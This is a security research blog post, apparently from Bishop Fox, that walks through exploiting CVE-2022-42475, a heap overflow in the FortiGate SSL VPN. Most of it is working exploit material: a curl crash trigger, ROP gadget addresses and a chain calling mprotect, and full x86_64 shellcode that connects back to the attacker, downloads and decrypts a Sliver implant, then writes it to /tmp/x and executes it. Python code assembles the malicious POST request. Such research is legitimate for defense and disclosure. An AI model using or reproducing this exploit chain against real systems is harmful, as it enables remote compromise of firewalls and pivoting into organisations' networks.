A More Complete Exploit for Fortinet CVE-2022-42475
Background
Recently, there has been some buzz about remotely exploitable vulnerabilities in Fortinet security appliances, especially FortiGate firewalls. This blog focuses on one such bug: CVE-2022-42475, a remotely exploitable heap overflow in the SSL VPN component of FortiGate and FortiProxy appliances. It was discovered in the wild by Fortinet in late 2022 during an investigation into a compromised firewall.
According to Fortinet the following specific FortiGate devices were targeted against unnamed European and African organizations:
- FG100F
- FG101F
- FG200D
- FG200E
- FG201F
- FG240D
- FG3H0E
- FG5H0E
- FG6H1E
- FG800D
- FGT5HD
- FGT60F
- FGT80F
Our Cosmos customers were promptly notified when this vulnerability affected them. As always, we prioritize our security research efforts in order to inform our customers about zero-day vulnerabilities.
Mandiant also performed an analysis of the bug along with the BOLDMOVE malware deployed alongside the exploit. The activity was attributed to Chinese nation-state actors that discovered, weaponized, and leveraged their customized exploit to compromise sensitive networks.
In this blog, we cover the bug, the outlines of the exploit, return-oriented programming (ROP) chains, shellcode, and optimizations. Unlike previously published research, we will share the way that an exploit can be built to target a single specific FortiGate appliance running a single specific version of FortiOS.
Since discovery and publication of details pertaining to CVE-2022-42475, a few researchers (see Prior Work below) have posted blogs and proof-of-concept (PoC) scripts that reproduce the bug and, in some cases, exploit it under highly restrictive conditions (i.e., specific appliance models and operating system versions).
Here on Team X, a specialized division within Bishop Fox's Capability Development group dedicated to vulnerability research and exploit development, we went after this bug in a deeper fashion. We are happy to report that we’ve largely succeeded in that mission and would like to share some of the journey with you.
Prior Work
We have a lot of ground to cover, so we won't be reviewing previous research in this blog. However, the publicly known state of FortiGate hacking is in its infancy, so we expect to see much more research in the future based on the work presented here and in other forums. To see details on initial work by other security researchers, check out these resources:
- Fortinet's write-up of the bug.
- Studyskill's work on extracting the affected/required files from FortiGate virtual machines.
- SCRT's work on reproducing the bug.
- Watchtowr's work on exploiting the bug.
Assumptions and Research Environment Configuration
Most of our testing was carried out against a FortiGate 100D purchased from eBay for a couple hundred dollars. It ran FortiOS 6.0.4 for the duration of the research project and sports an Intel x86_64 CPU. The remainder of testing was conducted against VMware versions of FortiGate. All FortiGate devices are Linux-based, albeit stripped down to the bare bones.
Simply being in possession of a FortiGate device is insufficient for research purposes because we needed root access to the underlying Linux OS (a.k.a. FortiOS) on hardware appliances and virtual machines to kick start our research. We determined that Fortinet did not provide a mechanism to obtain a root shell on their appliances, so we needed to hack a solution.
Getting Root Access to the 100D
To get a root shell on the 100D and to install GDB, Frida server, etc. we created a local root exploit for another FortiGate bug (CVE-2021-44168). Interestingly, much like CVE-2022-42475, CVE-2021-44168 was discovered during the investigation of a compromised FortiGate firewall. Note: we are beginning to see a pattern of a nation-state actor that has gone to great lengths to reverse-engineer Fortinet devices and create private 0-days for use against high-value targets.
The Bug
Reproducing the Crash
Based on SCRT's and Watchtowr's work, we started with these exploit commands:
$ perl -e 'print "A"x100000' > payload $ curl --data-binary @payload -H 'Content-Length: 4294967297' -vik 'https://vpn.example.com:8443/remote/logincheck?AAAA=BBBB'
When we attached to the sslvpnd daemon with gdb, we saw the following crash:
(gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007fae8fe964ee in ?? () from /fortidev/lib/x86_64-linux-gnu/libssl.so.1.1
Take a look at where it crashed:
(gdb) x/2i $rip => 0x7fae8fe964ee: call QWORD PTR [rax] 0x7fae8fe964f0: test eax,eax
We see that it dereferenced a function pointer stored in the rax
register and called it! What's in memory at the address in rax
?
(gdb) x/8x $rax 0x7fae8b58ea00: 0x41414141 0x41414141 0x41414141 0x41414141 0x7fae8b58ea10: 0x41414141 0x41414141 0x41414141 0x41414141
Well, well, well. Our payload appeared – what an absolute score of a result! The stars sure did align for this one.
Please note that we're not diving into the root causes of this bug. For that, please refer to Watchtowr's research on the matter. We're focused strictly on exploitation.
Identifying Exploit Mitigations
During our research, we investigated the exploit mitigation controls in FortiGate firewalls. We found the usual Linux OS-enforced data, but a few things were missing like data execution prevention (DEP), address space layout randomization (ASLR), stack canaries, and position independent executables (PIE). This trend seemed to be consistent across VMs and FortiGate hardware appliances.
Setting Exploit Goals
We wanted to drop a Sliver Linux implant onto the firewall, so we could use it as a pivot point into an organization's networks. Sliver implants are typically large (10MB is reasonable), and we found that embedding one into an HTTP POST request led to corruption every time. We simply could not inject the entire implant binary into memory reliably, and since reliability is one of the core goals of a high-quality exploit, we abandoned this approach. The root cause seemed to be the SSL VPN software scribbling over the implant data prior to the exploit being triggered. We could have written the exploit to shell out to the FortiGate's underlying Linux OS to perform a download of the Sliver implant, but there were several problems with that approach:
- No functioning shell in FortiOS
- No Perl, Ruby, PHP, etc., scripting languages
- Python isn't ubiquitous and is only present on older firewalls
- No consistent way to write a generic shell-out payload
Instead, we decided on using a more generic shellcode stager that ran in the following way:
- Attacker runs the exploit
- Exploit runs shellcode on the target appliance
- Shellcode connects back to attacker and downloads an encrypted Sliver implant
- Shellcode decrypts the Sliver implant and saves it to disk
- Shellcode runs the Sliver implant which connects back to attacker's Sliver server
Exploiting like the 90s
If we could execute code on the heap, we would have been in good shape to just write some shellcode, put it on the heap, and execute call [rax]
, but Linux DEP prevents that. Instead, we had to do some ROP chaining in which we found and reused existing code "gadgets" in the FortiGate sslvpnd
binary (which is actually just a symlink to a monolithic, 80MB, dynamically linked init
binary).
We didn’t want to use ROP for the entire download/decrypt/execute sequence because that is too painful, and we needed to jump from ROP into shellcode as quickly as possible. The goal of our ROP chain was simple:
- Pivot the stack pointer
rsp
to point at our HTTP POST payload, where the ROP chain and shellcode are stored. - Make the payload executable by calling
mprotect(rsp & 0xfffffffffffff000, 0x5000, PROT_READ | PROT_WRITE | PROT_EXEC)
on the memory region in which it is stored (the bitmask is used to align the memory address to a 4k page boundary). - Jump to shellcode within the payload.
Typically, ROP gadgets are built into a chain that repeats execute instructions; return;
until the desired objective is met, but the second and third steps are a little more convoluted than they seem at first. Let's check it out!
Execute the Stack Pivot
At the moment call [rax]
was executed (remember we controlled the address derefenced at rax
), the stack pointer rsp
pointed at sslvpnd
’s real stack. This was useless to us because our payload wasn’t there. It was somewhere on the heap, which means we had to figure out how to put the address of our payload into rsp
using only a single gadget. This is not always the case, but the complexity of multi-gadget stack pivots is outside the scope of this blog post.
Why just one gadget? At the end of a gadget, we'll typically hit a ret
instruction, which pops an address off the stack at address rsp
and jumps to it by placing that address into the rip
register. If rsp
doesn't point to our ROP chain when the ret instruction executes, then we're hosed. We have no control over the popped value, and we jump into garbage...or random instructions...or the stack. Regardless of where rip
ends up, the effect is the same - insta-crash.
The easiest way to pivot was to find a pointer to our payload in one of the registers and find a gadget that does the equivalent of mov rsp
, <register>
; ret;
. Did we have a pointer to the payload in any of the registers at the moment of exploitation? The answer in this case is yes!
Let's look at the registers at the point of crash:
(gdb) i r rax 0x4141414141414141 4702111234474983745 rbx 0x7fae8b569800 140387638745088 rcx 0x0 0 rdx 0x7fae8b56d4f8 140387638760696 rsi 0x7fae8b5736a8 140387638785704 rdi 0x7fae8b569800 140387638745088 rbp 0x7fffe4f967e0 0x7fffe4f967e0 rsp 0x7fffe4f94688 0x7fffe4f94688 r8 0x4141414141414141 4702111234474983745 r9 0x4141414141414141 4702111234474983745 r10 0x4141414141414141 4702111234474983745 r11 0x4141414141414141 4702111234474983745 r12 0x7fae8b569940 140387638745408 r13 0x7fae8b56d4f8 140387638760696 r14 0x131d2fc0 320679872 r15 0x7fae8b5736a8 140387638785704 rip 0x7fae8fe964ee 140387715474670 eflags 0x206 [ PF IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0
Ok, what's in rdx
?
(gdb) x/xg $rdx 0x7fae8b56d4f8: 0x4141414141414141
Bingo! rdx
pointed into our HTTP POST data. Therefore, the stack pivot requirements were as simple as mov rsp, rdx; ret
. Sadly, there was no such gadget in the sslvpnd
binary (whomp whomp). Time to hunt for more tricky gadgets!
After some fiddling with ropr, we identified the following regex that hit a few suitable gadgets:
0x00d90512: push rdx; lodsb [rsi]; adc bl, [rbx+0x41]; pop rsp; pop rbp; ret; 0x0130acd4: push rdx; add [rbx+0x41], ebx; pop rsp; mov qword ptr [rip+0x14792b24], 0x130aa20; pop rbp; ret; 0x01877a81: push rdx; add bl, [rbx+0x41]; pop rsp; pop rbp; ret; 0x01b666bc: push rdx; adc [rbx+0x41], bl; pop rsp; pop rbp; ret; 0x0285c4b0: push rdx; mov esi, 0xc48348fd; and [rbx+0x41], bl; pop rsp; pop rbp; ret; ==> Found 5 gadgets in 5.543 seconds
The simplest gadgets were:
0x01877a81: push rdx; add bl, [rbx+0x41]; pop rsp; pop rbp; ret; 0x01b666bc: push rdx; adc [rbx+0x41], bl; pop rsp; pop rbp; ret;
Picking the gadget at address 0x01b666bc
, we confirmed the gadget's existence and accuracy using Radare2:
r2 ./[redacted]/init -- r2 is for the people [0x00447d30]> s 0x01b666bc [0x01b666bc]> pi 5 push rdx adc byte [rbx + 0x41], bl pop rsp pop rbp ret
Excellent! There was only one remaining concern since this gadget had a few extraneous instructions, in particular adc byte [rbx + 0x41], bl
. This instruction dereferenced and wrote to the memory address stored in the rbx
register, which means rbx
had to point to a valid, mapped, and writeable area of memory. If it didn’t, the gadget would crash, and we would have needed a new gadget.
We were in luck, though, because of what we found in rbx
at the moment of exploitation:
(gdb) i r rbx rbx 0x7fae8b569800 140387638745088 (gdb) x/xg $rbx 0x7fae8b569800: 0x4141414141414141
That is a valid address alright – this gadget wouldn’t crash! The effective action of the stack pivot gadget (ignoring extraneous instructions) is therefore:
push rdx pop rsp ret
Now that we had a stack pivot gadget, we proceeded to the rest of the ROP chain.
Find the mprotect(2)
Function
To make our shellcode executable, we needed the address of mprotect(2)
in the target binary's procedure link table (PLT). The address was easy to obtain using objdump
:
objdump -D -j .plt init-6.4.9-800D | egrep 'mprotect' 000000000042ac50 <mprotect@plt>:
The address 0x42ac50
was the trampoline for the mprotect
function. If we jumped to it, we called mprotect
. It is important to note that this address was valid only for this specific binary; any other version of the FortiOS init
binary would have a slightly different address. For example, we used init
from the FortiGate 100D 6.0.4 firmware:
objdump -D -j .plt init-6.0.4-100D | egrep 'mprotect' 0000000000420630 <mprotect@plt>:
We saw that 0x420630
was not the same as 0x42ac50
. Therefore, we needed the function PLT addresses for each version of FortiOS that we wished to exploit. More on this later! For now, we had our mprotect
address. How did we use it?
Examine the Structure of mprotect
The mprotect
function was not a syscall
wrapper. Normally, we would have just found a gadget like syscall
; ret;
to call it directly, but in this case, we found that the available gadgets were of such low quality (they stomped all over a bunch of registers and memory) that we instead used a library function to call it.
Let's consider how to call mprotect
:
int mprotect(void *addr, size_t len, int prot);
So, we needed to do this:
#define PROT_RWX 7 // PROT_READ | PROT_WRITE | PROT_EXEC #define MEMORY_LENGTH 0x5000 // not important, just make it big enough for all the shellcode #define ALIGNED_ADDRESS address_of_shellcode & 0xfffffffffffff000 // page-aligned address mprotect(ALIGNED_ADDRESS, MEMORY_LENGTH, PROT_RWX);
The mprotect
call had to be passed a memory address that lies on a 4k page boundary hence the logical AND operation. If the address wasn’t on a page boundary, then the call would fail.
When calling functions on x86_64 System V ABI (as used by Linux / FortiOS), the arguments were passed in the registers rdi, rsi, rdx, rcx, r8,
and r9
in that order. We used the first three registers to populate the three parameters passed to mprotect
:
rdi = 7 rsi = 0x5000 rdx = ALIGNED_ADDRESS
The first two registers were easy to set using ROP gadgets: we just did pop
rdi; ret;
and pop rsi; ret;
and placed the values we needed onto the stack / ROP chain. Getting an aligned address into rdx
was a little more difficult because we needed to do the following steps:
- Get the memory address of our ROP chain / shellcode
- Do the logical AND operation
- Store the result in
rdx
Get the Address of Our ROP Chain
Let's look at the registers at the point of crash:
(gdb) i r rax 0x4141414141414141 4702111234474983745 rbx 0x7fae8b569800 140387638745088 rcx 0x0 0 rdx 0x7fae8b56d4f8 140387638760696 rsi 0x7fae8b5736a8 140387638785704 rdi 0x7fae8b569800 140387638745088 rbp 0x7fffe4f967e0 0x7fffe4f967e0 rsp 0x7fffe4f94688 0x7fffe4f94688 r8 0x4141414141414141 4702111234474983745 r9 0x4141414141414141 4702111234474983745 r10 0x4141414141414141 4702111234474983745 r11 0x4141414141414141 4702111234474983745 r12 0x7fae8b569940 140387638745408 r13 0x7fae8b56d4f8 140387638760696 r14 0x131d2fc0 320679872 r15 0x7fae8b5736a8 140387638785704 rip 0x7fae8fe964ee 140387715474670 eflags 0x206 [ PF IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0
We had the approximate address of our payload / ROP chain / shellcode in registers rbx
, rdx
, rdi
, rsi
, r12
, r13
, and r15
. I say "approximate" because all those registers pointed to slightly different addresses within the payload. This is fine because we were rounding down to the nearest 4k page, so we didn’t care about the least significant 3 bytes. With this in consideration, we got:
rbx 0x7fae8b569800 rdx 0x7fae8b56d4f8 rsi 0x7fae8b5736a8 rdi 0x7fae8b569800 r12 0x7fae8b569940 r13 0x7fae8b56d4f8 r15 0x7fae8b5736a8
We discarded any address starting with 0x7fae8b57xxxx
because those addresses were too far into our payload. We ran the risk of making the wrong section of memory executable. The following candidates remained:
rbx 0x7fae8b569800 rdx 0x7fae8b56d4f8 rdi 0x7fae8b569800 r12 0x7fae8b569940 r13 0x7fae8b56d4f8
We discarded the higher addresses, which left:
rbx 0x7fae8b569800 rdi 0x7fae8b569800
rbx
and rdi
were our candidate registers for finding the address of our payload / ROP chain / shellcode. We wanted to perform a logical AND operation such that 0x7fae8b569800 & 0xfffffffffffff000 = 0x7fae8b569000
.
Call mprotect
to Make Our Payload Executable
We assembled the following gadget chain to perform the operation:
// Set up arguments #2 and #3 for mprotect pop rsi; ret; // pop 0x5000 off the "stack" (aka ROP Chain) into rsi (2nd mprotect argument) pop rdx; ret; // pop 0x7 off the "stack" into rdx (3rd mprotect argument ) // Set up argument #1 for mprotect pop rax; ret; // pop 0xfffffffffff000 off the "stack" into rax and rax, rdi; ret; // do "0xfffffffffff000 & 0x7fae8b569800" and save result in rax // There is no "mov rdi, rax; ret;" gadget available, so we use this more complex variant instead. pop rbx; ret; // pop address of a NOP gadget off the "stack" into rbx mov rdi, rax; call rbx; // copy page-aligned address into rdi (1st mprotect argument) // call rbx (address of NOP gadget that simply does a RET) // We put 8 RET instructions on the ROP chain so that the NOP gadget's RET lands here. // You could call this a "ret sled" instead of a "nop sled". ret; ret; ret; ret; ret; ret; ret; ret; // Call mprotect pop rax; ret; // pop the mprotect PLT address of the "stack" jmp rax; // mprotect will RET and execution will continue at the next ROP instruction
We now had executable shellcode at a known address in memory.
Jump to Our Shellcode
The jump to shellcode was simple:
// Last instruction in the ROP chain simply jumps to the stack pointer which // conveniently points at the next item on our payload / ROP chain / shellcode. jmp rsp; // Shellcode follows 0x9090909090909090 // NOP sled ...
Writing the Shellcode
We applied arbitrary shellcode to the exploit because there were no disallowed characters. This made the process of writing shellcode pretty straightforward. Of course, we over-complicated this process to achieve the following goals:
- All shellcode/payload/staging/implant/data must be encrypted in transit over the internet
- Everything in the exploit payload must fit into a 64k buffer to avoid data corruption
- The exploit must get feedback from the shellcode regarding its status as it runs
- The exploit must deploy a Sliver implant onto the FortiGate firewall
Encrypt All the Things
We could have written our own crypto functions, but that wasn’t efficient. Instead, we borrowed OpenSSL's AES_set_decrypt_key
and AES_cbc_encrypt
functions from the FortiGate binary's PLT by using the same objdump
trick we used for mprotect
:
objdump -D -j .plt init-6.0.4-100D | egrep ' <(mprotect|calloc|AES_set_decrypt_key|AES_cbc_encrypt)@plt'| sed -e 's/00000000//g' -e 's/ </:/g' -e 's/@plt>://g' 00420630:mprotect 00424720:AES_cbc_encrypt 00424a40:calloc 00426d70:AES_set_decrypt_key
The exploit then patched the decryption function PLT addresses into the shellcode at runtime. For example, here's a snippet from the shellcode where the address of AES_set_decrypt_key()
was marked with a placeholder until the exploit replaced it with the correct value:
# setup and call OpenSSL's AES_set_decrypt_key() movq %r10, %rdi # ptr to AES key bytes movq $0x80, %rsi # 128 (0x80) bits movq %r15, %rdx # AES_key struct address movabs $0x3333333333333333, %rax # replaced at runtime with real GOT address movq %rax, %rcx # address of AES_set_decrypt_key() movq %rsp, %rbx addq $0x4000,%rsp callq *%rcx
Inside the exploit our code did this prior to copying the shellcode into the exploit payload buffer:
# fix up GOT function addresses in the shellcode shellcode = shellcode.replace(b"33333333", struct.pack("<Q", rop.get_address("AES_set_decrypt_key"))) shellcode = shellcode.replace(b"44444444", struct.pack("<Q", rop.get_address("AES_cbc_encrypt"))) shellcode = shellcode.replace(b"55555555", struct.pack("<Q", rop.get_address("calloc")))
This method allowed us to write the shellcode and make it portable across all of the versions of FortiGate that we wanted to target.
Shellcode
Speaking of shellcode, let’s take a look at it.
# assemble: as -o shellcode.o shellcode.s # convert: objdump -d -M intel shellcode.o|egrep ‘^…[a-z0-’]:'|cut -c 7-28|tr ‘d ’\n'|tr ‘d‘' '|tr ‘d ’\t'|s‘d 's/\(..\)/\\x\’/g' .global _shellcode .global _readloop .text
Above, we saw the preamble and a set of comments with instructions on how to convert the assembled .o file into a \x
-encoded sequence of op-code bytes.
Next, we called socket(2)
to create a new socket that we used to connect back from the exploited FortiGate to the attacker's internet-facing computer:
_shellcode: # socket(2) movq $0x2, %rdi # AF_INET movq $0x1, %rsi # SOCK_STREAM movq $0x0, %rdx # 0 movq $0x29, %rax # 41 = 0x29 = socket syscall syscall # rax = socket(AF_INET, SOCK_STREAM, 0); movq %rax, %rbx # save socket fd in rbx
Having acquired a socket, the next step was to connect(2)
to the attacker's computer. We did this by creating the required data structures in registers and then pushing them onto the stack to create a C-style struct
. The comments in the code showed exactly what each byte was doing in each register:
# connect(2) # We're going to build a hokey sockaddr_in struct using registers, then push it to the stack. # Here's the struct: # # struct sockaddr_in { # short sin_family; // e.g. AF_INET # unsigned short sin_port; // e.g. htons(3490) # struct in_addr sin_addr; // see struct in_addr, below # char sin_zero[8]; // zero this by convention # }; # # struct in_addr { # unsigned long s_addr; // little endian byte order IPv4 address # }; xorq %rdx, %rdx pushq %rdx # push 0x0000000000000000 (sockaddr_in->sin_zero) # I = IP address # P = TCP port # F = AF_INET # IIIIIIIIPPPPFFFF movq $0x5858585858580002, %rdx # sockaddr_in-> sin_addr, sin_port, sin_family pushq %rdx # store it after sin_zero on the stack movq %rax, %rdi # %rax = sock # from socket() syscall movq $0x10, %rdx # sizeof(sockaddr_in) = 16 bytes movq %rsp, %rsi # sockaddr_in struct is on stack @ %rsp movq $0x2a, %rax # connect(2) syscall syscall
Once the shellcode connected to the attacker's computer it sent a quick "hello" packet containing an arbitrary 8-byte value specified by the exploit. The exploit checked the packet and verified that it contained the expected 8-byte value. If the value matched, it was assumed that the shellcode was running correctly:
# write(2) response to the stager to say hello subq $0x20, %rsi movabs $0x3838383838383838, %rax movq %rax, (%rsi) # response contains whatever the exploit patched in here. movq %rbx, %rdi # socket fd -> rdi movq $0x8, %rdx # payload len = 8 bytes movq $0x1, %rax # write(2) syscall syscall # connect() to hax0r host
The shellcode then expected the exploit to send a 4-byte length value followed by an encrypted data blob of that length. The data blob was eventually decrypted, saved to the filesystem of the firewall, and passed to execve
to be executed as an implant. The following code read the length value and saved it in the r13
register:
# read(2) 4 bytes to use as size X for next read movq %rbx, %rdi # fd -> rdi movq %rsp, %rsi # stack ptr -> rsi subq $0x8, %rsi # move rsi up 8 bytes (storage location) movq $0x4, %rdx # read 4 bytes movq $0x0, %rax # read(2) system call syscall # read 4 bytes from socket. use it as <size> for the next payload. # save the payload size in r13 movq (%rsi), %rdx # rdx = num bytes to read from socket movq %rdx, %r13 # save payload size in r13
We used calloc
to allocate a block of memory large enough to store the incoming encrypted implant data. Note that 0x3535353535353535
was a placeholder for the address of calloc
in the PLT of the FortiGate /bin/init
binary and was replaced at runtime by the exploit:
# calloc(size_of_encrypted_payload) movabs $0x3535353535353535, %rax movq %r13, %rdi movq $0x1, %rsi callq *%rax
Now that the shellcode allocated a memory region large enough for the payload, we began the process of reading the encrypted implant data:
# read(2) X bytes of payload movq %r13, %rdx # encrypted payload size in bytes movq %rbx, %rdi # socket fd movq %rax, %rsi # address of calloc()'d buffer movq %rsi, %r12 # save calculated payload address in r12 xorq %rcx, %rcx # flags = 0 movq $0x0, %r8 # srcaddr = NULL movq $0x0, %r9 # addrlen = 0 xorq %r10, %r10 # use r10 to track total bytes read so far # rdi = fd # rsi = storage ptr # rdx = num bytes to read # rcx = flags # r8 = NULL # r9 = 0 # rax = 0x2d ('recvfrom' syscall #) # call: recvfrom(rdi, rsi, rdx, rcx, r8, r9) # r13 = size of payload # r15 = num bytes left to read _readloop: movq $0x2d, %rax # recvfrom(2) syscall syscall # try to read rdx <size> bytes cmpq $-0x1, %rax jle _readfinished # abort on error addq %rax, %r10 # keep track of total bytes read addq %rax, %rsi # add num bytes just read to payload buffer address movq %r13, %r11 subq %r10, %r11 movq %r11, %rdx cmpq %r10, %r13 # if we read all the bytes... jg _readloop # ...then exit the loop, otherwise read some more _readfinished:
Now that the entire encrypted data blob was read, the shellcode wrote an "all clear" message to the exploit to let it know what stage it was at:
# we have finished reading the payload. # write(0xbf) goodbye response to the stager. movq %rsp, %rsi # source buffer is in rsi addq $0x8, %rsi # clobber the start of the shellcode nop sled, who cares movabs $0x3838383838383838, %rax movq %rax, (%rsi) # response contains whatever the exploit patched in here. movq %rbx, %rdi # socket fd -> rdi movq $0x8, %rdx # payload len = 8 bytes movq $0x1, %rax # write(2) syscall
The socket was then closed, and we no longer needed to talk to the exploit. We ran autonomously.
# close the socket movq %rbx, %rdi # socket fd -> rdi movq $0x3, %rax # close(2) syscall # close the socket
This piece of code took the randomly generated AES key (which, like most other things is patched into the shellcode at runtime) and used it to decrypt the blob we just received from the exploit:
# at this point we have the encrypted payload in memory. R12 is a pointer. # create another pointer: # r14 -> buffer for decrypted payload (re-use the encrypted buffer!) movq %r12, %r14 # r15 -> AES_key struct (244 bytes, but allow more) movq %rsp, %rdx subq $0x200, %rdx movq %rdx, %r15 # r10 -> actual AES key (16 bytes) subq $0x10, %rdx movq %rdx, %r10 # r11 -> iv subq $0x10, %rdx movq %rdx, %r11 # reminder of things in callee-saved regs at this stage: # r12 = ptr to encrypted payload # r13 = length of encrypted payload # r14 = ptr to buffer for decrypted payload # r15 = OpenSSL AES_key struct # and caller-saved: # r10 = AES key # r11 = iv # These placeholders will be patched by the exploit at runtime. # The patched bytes are a one-time-use 128-bit AES key used by the exploit # to encrypt the payload we just received. We’ll decrypt it next. # First let’s push the 16-byte key onto the stack. movabs $0x3030303030303030, %rax movq %r10, %rdx movq %rax, (%rdx) movabs $0x3131313131313131, %rax movq %rax, 0x8(%rdx, 1) # put the IV adjacent to the AES key on the stack movabs $0x0, %rax movq %r11, %rdx movq %rax, (%rdx) movq %rax, 0x8(%rdx, 1) # setup and call OpenSSL’s AES_set_decrypt_key() movq %r10, %rdi # ptr to AES key bytes movq $0x80, %rsi # 128 (0x80) bits movq %r15, %rdx # AES_key struct address movabs $0x3333333333333333, %rax # replaced at untime with real GOT address movq %rax, %rcx # address of AES_set_decrypt_key() movq %rsp, %rbx addq $0x4000,%rsp callq *%rcx movq %rbx, %rsp # setup and call OpenSSL’s AES_cbc_encrypt() movq %r12, %rdi # encrypted data movq %r14, %rsi # buffer for decrypted data movq %r13, %rdx # encrypted data length movq %r15, %rcx # OpenSSL AES_key struct movq %r15, %r8 subq $0x20, %r8 # iv movq $0x0, %r9 # AES_DECRYPT movabs $0x3434343434343434, %rax # AES_cbc_encrypt() movq %rsp, %rbx addq $0x4000,%rsp callq *%rax movq %rbx, %rsp
At this point the implant has been decrypted in memory so time to write it to disk:
# write the cleartext payload to disk # open("/tmp/x", O_CREAT | O_RDWR) movabs $0x00782f706d742f, %rax # /tmp/x\x00 movq %rsp, %rdi # stack ptr -> rdi subq $0x8, %rdi # we'll place filename at rsp-8 movq %rax, (%rdi) # store filename on stack at rsp-8 movq $0x42, %rsi # O_CREAT | O_RDWR movq $0x1ff, %rdx # 0777 & OS umask = 0755 = executable by all movq $0x2, %rax # open(2) syscall # open("/tmp/x", O_CREAT | O_RDWR, 0777); # write(payload) to "/tmp/x" # The value 0x3232323232323232 will be patched at runtime by the exploit and # contains the real length of the payload, not the padded length used for AES CBC. movq %rax, %rdi # /tmp/x fd -> rdi movq %rax, %r13 # save a copy of the fd movq %r14, %rsi # decrypted payload address -> rsi movabs $0x3232323232323232, %rax # payload len -> rdx movq %rax, %rdx movq $0x1, %rax # write(2) syscall syscall # write payload to /tmp/x # close "/tmp/x" movq %r13, %rdi # file fd -> rdi movq $0x3, %rax # close(2) syscall # close the /tmp/x file descriptor
The last stage is to execute the payload via the execve
syscall:
# call execve() movabs $0x00782f706d742f, %rax # /tmp/x\x00 movq %rax, (%r12) # "/tmp/x\x00" into mem @ r14 movq %r12, %rdi # address of /tmp/x into rdi movq $0x0, %rsi movq $0x0, %rdx movq $0x3b, %rax # execve syscall syscall
We're good netizens, so we made an exit from the child process to avoid a crash. The FortiGate firewall has a watchdog that restarts dead processes automatically and things tidy themselves up after this part is complete.
_final: # call _exit() # exit cleanly. The watchdog restarts sslvpnd. movq $0xe7, %rax xorq %rax, %rax syscall ####### EOF is never reached ########
A Quick Recap
At this stage we've covered:
- The bug
- The PoC / trigger
- The stages of the exploit
- Obtaining the necessary addresses
- A little bit on ROP
- Writing shellcode
The glue that held all this together is the ROP chain. We used a light-weight Python class to simplify the construction of the ROP chain.
Create a ROP Chain
Take at look at how we built an ROP chain:
rop.clear_gadget_chain() req = bytearray(b"") req += b"POST /remote/logincheck?magic=aaa HTTP/1.1\r\nHost: " + self.host.encode() + b": " + str(self.port).encode() + b"\r\nContent-Length: " + CONTENT_LENGTH + b"\r\nUser-Agent: AAAAAAAAAAAAAAAA\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n\r\n" # Just padding the start of the ROP buffer rop.add_padding(HEAD_PAD_LENGTH-2) # this is of no consequense # Stage 2 - The stack pivot gadget dumps us here. # Stage 2.5 - "slide" down the stack by popping RETs # The hit a "add rsp, 0x18" to add 0x18 (24) bytes to $rsp. # We do this to "jump over" the stack pivot gadget and land in ~ 100kb of space that we control. # Not all platforms will give us a "add rsp, 0x18" gadget, but we might get "add rsp, xxx", so # we use RET to get us right up to the pivot and then jump over it using whatever gadget we can. # We land in another RET sled to account for not knowing the jump size in advance. rop.add_gadget("ret;", 23) rop.add_gadget("add rsp, 0x18; ret;") # Stage 1 - Entry point of the ROP chain. # # The exploit sets $rip to the address of STACK_PIVOT_GADGET then RETs to stage 2, above. # This part will be jumped over by stage 2.5, above. rop.add_gadget("push rdx; adc byte [rbx + 0x41], bl; pop rsp; pop rbp; ret;") # Entry point: overwrite rip with the stack pivot gadget. # Stage 3 - RET sled # rop.add_gadget("ret;", 32) # RET sled consists of 32 RET instructions # Stage 4 - Calculate aligned memory page for stack address rop.add_gadget("pop rax; ret;") rop.add_immediate(0xfffffffffffff000) rop.add_gadget("and rax, rdi; ret;") rop.add_gadget("pop rbx; ret;") rop.add_gadget("add rsp, 0x18; ret;") rop.add_gadget("mov rdi, rax; call rbx;") rop.add_gadget("ret;", 8) rop.add_gadget("pop rsi; ret;") rop.add_immediate(MEM_LEN) rop.add_gadget("pop rdx; ret;") rop.add_immediate(PROT_RWX) rop.add_gadget("pop rax; ret;") rop.add_gadget("mprotect") rop.add_gadget("jmp rax;") # Stage 7 - NOP/RET sled, then JMP to stack address. # At this point our ROP payload/stack is executable. Shellcode follows. rop.add_gadget("ret;", 8) rop.add_gadget("jmp rsp;") rop.add_immediate(0x9090909090909090, 8) # build and convert the shellcode #run( [ 'as', '-o', 'shellcode.o', 'shellcode.s' ], check=True ) result = run("objdump -d -M intel shellcode.o |egrep '^...[a-z0-9]:' |cut -c 7-28|tr -d '\\n'|tr -d ' '|tr -d '\\t'|xxd -r -p", shell=True, capture_output=True) shellcode = result.stdout # patch in the relevant AES key for payload decryption shellcode = shellcode.replace(b"00000000", self.AES_key[0:8]) shellcode = shellcode.replace(b"11111111", self.AES_key[8:17]) # we need to know the real length of the payload file before padding shellcode = shellcode.replace(b"22222222", struct.pack("<Q", self.payload_length)) # fix up GOT function addresses in the shellcode shellcode = shellcode.replace(b"33333333", struct.pack("<Q", rop.get_address("AES_set_decrypt_key"))) shellcode = shellcode.replace(b"44444444", struct.pack("<Q", rop.get_address("AES_cbc_encrypt"))) shellcode = shellcode.replace(b"55555555", struct.pack("<Q", rop.get_address("calloc"))) # patch in the model # of the device we're brute-forcing so that the ping-back tells us # which payload worked null_len = 8 - len(hw_version) # assumption breaks if strlen(hw_version) > 7 patch = hw_version + "\x00"*null_len shellcode = shellcode.replace(b"88888888", patch.encode()) # patch in the operator's IP shellcode = shellcode.replace(b"XXXXXX", struct.pack(">H", self.connectBackPort ) + self.ip_as_bytes(self.connectBackHost)) # shellcode gets tacked onto the end of the 8-byte NOP sled rop.add_bytes(shellcode) # sprinkle liberally with 4MB of padding rop.add_padding(PADDING_LEN) req += rop.bytes()
You can see that we tried to make it simple to build the ROP chain using methods like add_gadget
and add_immediate
that make it easy to add ROP gadgets and 8-byte little-endian byte order immediate values.
The general gist of this code is that the buffer req
is populated with:
- HTTP request
- HTTP POST body containing the trigger for the exploit (malicious Content-Length header)
- New function pointer address that points at our stack pivot gadget
- ROP chain
- Shellcode
Having completed the exploit payload, we sent the req
buffer to the SSL VPN's HTTP service. This triggered the bug immediately, causing the service to run the shellcode, download the implant, and connect the Sliver agent to our C&C infrastructure.
Conclusion
We hope this blog offers a unique perspective that shares the rough outlines of how to create an exploit for a single software/hardware version of FortiGate. Our goal is to add deeper layers of analysis to the existing resources in the security community that are mentioned above. We look forward to sharing additional analysis techniques from continued discovery efforts against FortiGate security appliances in the future.
